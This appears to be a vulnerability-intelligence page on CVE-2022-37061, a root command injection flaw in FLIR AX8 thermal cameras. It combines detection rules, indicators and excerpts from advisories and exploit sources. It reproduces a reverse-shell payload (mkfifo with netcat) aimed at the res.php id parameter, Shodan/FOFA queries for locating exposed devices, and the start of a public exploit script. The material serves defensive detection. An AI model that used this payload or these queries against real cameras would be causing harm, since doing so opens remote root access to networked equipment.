CVE-2022-37061
Published 2022-08-18
Priority P192 · critical · 9.8 CVSS 3.1
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS 99.62% (99.9th percentile)
All FLIR AX8 thermal sensor cameras up to and including version 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges. NOTE: The vendor has stated that with the introduction of firmware version 1.49.16 (Jan 2023) the FLIR AX8 should no longer be affected by the reported vulnerability. The latest firmware version as of Oct 2025 is 1.55.16 (released Jun 2024).
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flir | flir_ax8_firmware | <= 1.46.16 | — |
Detection & IOCs
command: action=alarm&id=2;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20{}%20{}%20%3E%2Ftmp%2Ff
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:8; content:"/res.php"; fast_pattern; http.request_body; content:"action|3d|alarm"; content:"id|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,www.cve.org/CVERecord?id=CVE-2022-37061; reference:cve,2022-37061; classtype:attempted-admin; sid:2065895; rev:1; metadata:affected_product FLIR, attack_target Networking_Equipment, tls_state plaintext, created_at 2025_11_24, cve CVE_2022_37061, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_11_24, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
regex: 'uid=([0-9(a-z)]+)' AND 'gid=([0-9(a-z)]+)' AND 'visualBeep' in HTTP response body
- Look for HTTP POST requests to /res.php with a body containing 'action=alarm' and an 'id' parameter value that includes shell metacharacters (;, |, `, $, newline); this is the injection point for CVE-2022-37061.
- The Emerging Threats Snort rule (sid:2065895) fires on POST /res.php with a body matching 'action=alarm' and 'id=' followed by shell injection metacharacters via PCRE: /^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R
- Successful exploitation produces a response body containing both 'uid=' and 'gid=' output (from the injected 'id' OS command) alongside the string 'visualBeep' from the normal alarm response; use this combination to confirm exploitation.
- The exploit is unauthenticated: no prior login session is required to reach /res.php and inject commands. Monitor for POST requests to /res.php from unauthenticated sources.
- Shodan/FOFA exposure queries for vulnerable devices: Shodan title:"FLIR", FOFA app="FLIR-AX8". Use these to identify internet-exposed instances.
- The reverse shell payload uses the classic mkfifo+netcat pattern URL-encoded in the id parameter: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f. Watch for this pattern in POST bodies or in process trees on the device.
- The Metasploit module for this CVE uploads and executes a payload to gain root; look for unexpected file writes or process spawns from the web server process on FLIR AX8 devices.
- The vulnerability is only present in FLIR AX8 firmware versions up to and including 1.46.16. Firmware 1.49.16 (Jan 2023) and later are not affected.
- The ET Snort rule (sid:2065895) is scoped to plaintext HTTP traffic only (tls_state plaintext); encrypted HTTPS traffic to the device will not be detected by this rule.
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
GHSA-r2vv-rr99-h5p9: All FLIR AX8 thermal sensor cameras version up to and including 1
ghsa_unreviewed·2022-08-19
CVE-2022-37061 [CRITICAL] CWE-78 GHSA-r2vv-rr99-h5p9: All FLIR AX8 thermal sensor cameras version up to and including 1
All FLIR AX8 thermal sensor cameras up to and including version 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.
VulnCheck
flir flir_ax8_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-37061 [CRITICAL] flir flir_ax8_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Affected: flir flir_ax8_firmware
Suricata
ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)
suricata·2025-11-24·CVSS 9.8
CVE-2022-37061 [CRITICAL] ET WEB_SPECIFIC_APPS FLIR res.php id Parameter Command Injection Attempt (CVE-2022-37061)
Exploit-DB
FLIR AX8 1.46.16 - Remote Command Injection
exploitdb·2025-04-16·CVSS 9.8
CVE-2022-37061 [CRITICAL] FLIR AX8 1.46.16 - Remote Command Injection
---
# Exploit Title: FLIR AX8 1.46.16 - Remote Command Injection
# Date: 8/19/2022
# Exploit Author: Samy Younsi Naqwada (https://samy.link), SC
# Vendor Homepage: https://www.flir.com/
# Software Link: https://www.flir.com/products/ax8-automation/
# PoC: https://www.youtube.com/watch?v=dh0_rfAIWok
# Version: 1.46.16 and under.
# Tested on: FLIR AX8 version 1.46.16 (Ubuntu)
# CVE : CVE-2022-37061
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
urllib3.disable_warnings()
def banner():
flirLogo = """
███████╗██╗ ██╗██████╗
██╔════╝██║ ██║██╔══██╗
█████╗ ██║ ██║██████╔╝
██╔══╝ ██║ ██║██╔══██╗
██║ ███████╗██║██║ ██║
╚═╝ ╚══════╝╚═╝╚═╝ ╚═╝
.----------
Nuclei
FLIR AX8 1.46.16 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2022-37061 [CRITICAL] FLIR AX8 1.46.16 - Remote Command Injection
FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability. The vulnerability exists in the alarm functionality, where user-supplied input in the 'id' parameter is not properly sanitized, allowing attackers to inject and execute arbitrary OS commands.
Template:
id: CVE-2022-37061

info:
  name: FLIR AX8 1.46.16 - Remote Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    FLIR AX8 version 1.46.16 and below is susceptible to an unauthenticated remote command injection vulnerability. The vulnerability exists in the alarm functionality where user-supplied input in the 'id' parameter is not properly sanitized, allowing attackers to inject and execute arbitrary OS commands.
  impact: |
Metasploit
FLIR AX8 unauthenticated RCE
metasploit
All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. This module uses the vulnerability to upload and execute payloads gaining root privileges.
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
| CVE/Product | Description |
|---|---|
| CVE-2019-12725 | Zeroshell Remote Command Execution Vulnerability |
| CVE-2019-17621 | D-Link DIR-859 Remote Command Injection Vulnerability |
| CVE-2019-20500 | D-Link DWL-2600AP Remote Command Execution Vulnerability |
| CVE-2021-25296 | Nagios XI Remote Command Injection Vulnerability |
| CVE-2021-46422 | Telesquare SDT-CW3B1 Router Command Injection Vulnerability |
| CVE-2022-27002 | Arris TR3300 Remote Command Injection Vulnerability |
| CVE-2022-29303 | SolarView Compact Command Injection Vulnerability |
| CVE-2022-30023 | Tenda HG9 Router Command Injectio |
Authors: Chao Lei, Zhibin Zhang, Yiheng An, Cecilia Hu
Published: June 22, 2023
Tags: Trend Reports, Vulnerabilities, Botnet, CVE-2019-12725, CVE-2019-17621, CVE-2019-20500, CVE-2021-25296, CVE-2021-46422, CVE-2022-27002, CVE-2022-29303, CVE-2022-30023, CVE-2022-30525, CVE-2022-31499, CVE-2022-36266, CVE-2022-40005, CVE-2022-45699, CVE-2023-1389, CVE-2023-25280, CVE-2023-27240, IoT, IoT Security, Mirai
- http://packetstormsecurity.com/files/168114/FLIX-AX8-1.46.16-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/168116/FLIR-AX8-1.46.16-Traversal-Access-Control-Command-Injection-XSS.html
- http://packetstormsecurity.com/files/169701/FLIR-AX8-1.46.16-Remote-Command-Injection.html
- https://gist.github.com/Nwqda/9e16852ab7827dc62b8e44d6180a6899
- https://github.com/WlX-33/PoC-for-CVE/blob/main/CVE-2022-36266/FLIR%20AX8%20Unauthenticated%20OS%20Command%20Injection.py
- https://www.flir.com/products/ax8-automation/
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php